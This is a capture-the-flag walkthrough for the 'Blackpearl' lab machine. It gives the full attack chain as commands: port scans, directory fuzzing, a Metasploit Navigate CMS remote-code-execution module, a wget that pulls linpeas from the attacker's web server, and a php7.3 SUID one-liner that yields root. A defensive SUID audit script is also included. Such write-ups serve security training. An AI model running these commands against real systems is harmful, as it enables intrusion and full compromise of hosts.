After powering on the Blackpearl machine, we log in with the following credentials:
Username: root
Password: tcm
To obtain an IP address via DHCP, we run:
dhclient
Then we display it with:
ifconfig
Now that we have the IP address, we switch to our Kali machine and ping the Blackpearl machine to confirm that the two can communicate with each other.
Use the command:
ping 192.168.158.129 -c3
NB: remember to change the IP address to your Blackpearl machine's IP address.
From the image above, we can see that the two machines can communicate, so next we run an Nmap scan using the command:
nmap -p- -A 192.168.158.129
From the image above, we can see that three ports are open, including port 80, so we visit the default web page using the machine's IP address.
From our Firefox browser we visit http://192.168.158.129
Right-click and select View Page Source.
In the page source we find the string alek@blackpearl.tcm, as seen below, so we note it down somewhere.
I couldn't find anything else on the page, so my next step is to look for hidden directories using ffuf.
Use the command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.158.129/FUZZ
We found a hidden directory called secret, as seen below.
We go back to our browser and visit the page:
192.168.158.129/secret
That page serves a file; we downloaded and opened it, but it was of no help.
From the open ports we recall that port 53 (DNS) is open, so now we do some recon on it.
Use the command:
dnsrecon -r 127.0.0.0/24 -n 192.168.182.148
NB: after the "-n" flag, supply your Blackpearl machine's IP address.
It found a DNS pointer (PTR) record for blackpearl.tcm; recall that earlier we found alek@blackpearl.tcm.
So now we need to add that name to our hosts file.
Use the command:
nano /etc/hosts
Add a line with your Blackpearl machine's IP address and the domain name blackpearl.tcm, as seen in the image above, then save and exit.
Now on your browser, visit the page:
http://blackpearl.tcm
After much enumeration, I decided to search blackpearl.tcm for hidden directories using the command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
As seen in the image above, a hidden directory called navigate was found.
So now we navigate to navigate (pun intended, lol).
On your web browser visit the page:
http://blackpearl.tcm/navigate/
A Navigate CMS web page was displayed, so I searched online for a Navigate CMS exploit.
Click on the option found above.
The description matches the version of Navigate CMS we are trying to exploit.
To use it we have to start Metasploit on our Kali machine with the command:
msfconsole
Use the command seen in the image below.
Copy "use exploit/multi/http/navigate_cms_rce" and paste it into your msfconsole.
Input the command:
options
Now we need to set rhosts and vhost.
Input the command:
set rhosts 192.168.182.148
and
set vhost blackpearl.tcm
Input the command options again to confirm.
Now input the command:
run
A shell has been popped.
Input the command:
shell
A shell has been created, but it looks different from what we are used to: it should show a prompt such as user@hostname, and it does not.
So we need to upgrade to what is known as a TTY shell. We search Google for "tty shell" and click on the result seen below.
I prefer to use Python, so I first need to confirm that it is available on the machine. In the shell we popped, input the command below to verify that Python is present:
which python
The image above shows that Python is present.
So copy the command for Python.
Now edit it to the command seen below, because I want to use bash rather than sh:
python -c 'import pty; pty.spawn("/bin/bash")'
Now paste the above command in the shell.
Now a proper shell has been popped. Since we are a low-privileged user, we need to do some privilege escalation.
For this we are going to use linpeas.
I already have linpeas downloaded, so I open another tab on my Kali machine and start a web server in the directory where linpeas is located.
NB: if you do not have linpeas downloaded, comment below and I'd show you how; a previous write-up of mine also covers that.
After changing to the directory where your linpeas is located, input the following command:
python3 -m http.server 80
Then on your shell tab, input the following command:
wget http://192.168.182.129/linpeas.sh -O linpeas.sh
linpeas has been successfully airdropped.
Input the command below to confirm:
ls
Now to be able to run linpeas, input the command:
chmod +x linpeas.sh
and run it using the command:
./linpeas.sh
When looking through the linpeas output, we focus mainly on anything highlighted in red or yellow.
For this particular box, we focus on the s permission bit we can see highlighted in the image above.
If you are familiar with Linux file permissions, you know that the usual bits are r, w and x, which stand for read, write and execute respectively.
But in the owner (root) execute position we are seeing an s instead, the SUID bit, which means the binary runs with root's privileges and we can abuse that feature.
Input the command below to list all the SUID binaries we can run as root and abuse, in a much cleaner format:
find / -type f -perm -4000 2>/dev/null
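From the defender's side, the check a hardening or detection script would run here is the same enumeration in reverse: list the SUID files and flag any that are not on the small set of binaries expected to carry the bit, since an interpreter like php7.3 with SUID set hands root to any local user. The script below is an added example, not part of the original write-up; the allowlist, the sample listing and the function names (setuid_from_mode, flag_unexpected_suid, audit_live_system) are my own assumptions and are not taken from the Blackpearl box.

```sh
#!/bin/sh
# Added example (not from the original write-up): audit SUID files against an
# allowlist and flag the rest. An interpreter with the SUID bit set (like the
# /usr/bin/php7.3 found on this box) is exactly the kind of entry this catches.

# Binaries expected to carry the SUID bit on a typical Debian-style host.
# This allowlist is an assumption; build your own from a known-good baseline.
SUID_ALLOWLIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp"

# setuid_from_mode MODE: returns 0 if a symbolic mode string such as
# -rwsr-xr-x (as printed by ls -l) has the setuid bit in the owner-execute
# slot. Lowercase s means setuid plus execute; uppercase S means setuid
# without execute, which is unusual and worth a second look either way.
setuid_from_mode() {
    case "$1" in
        ???s??????|???S??????) return 0 ;;
        *) return 1 ;;
    esac
}

# flag_unexpected_suid: read one path per line on stdin and print every path
# that is not on the allowlist.
flag_unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# audit_live_system: the same find enumeration used in the write-up, piped
# through the allowlist filter. Run as root so every directory is readable.
audit_live_system() {
    find / -type f -perm -4000 2>/dev/null | flag_unexpected_suid
}

# Constructed sample standing in for the find output on a compromised box.
SAMPLE_SUID_LIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/php7.3
/usr/bin/mount
/usr/local/bin/backup_helper"

# demo: run the filter over the constructed sample; it prints the two entries
# that are not on the allowlist (php7.3 and the custom backup helper).
demo() {
    printf '%s\n' "$SAMPLE_SUID_LIST" | flag_unexpected_suid
}

demo
```

On a real host, call audit_live_system as root and feed the result into your baseline comparison or alerting; anything it prints is either a binary missing from your allowlist or a SUID bit that should not be there.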
Now visit the GTFOBins website in your browser.
Select SUID.
Scroll down and select php, because that is the only one of our SUID binaries that is listed there.
After clicking on php, scroll down and look for the SUID section.
We are only going to copy the command highlighted in the image below, and we need to call the binary by its full path, because ours is not plain php but php7.3.
So input the command:
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
Once that has been executed, input the command:
whoami
As you can see, we have become ROOT!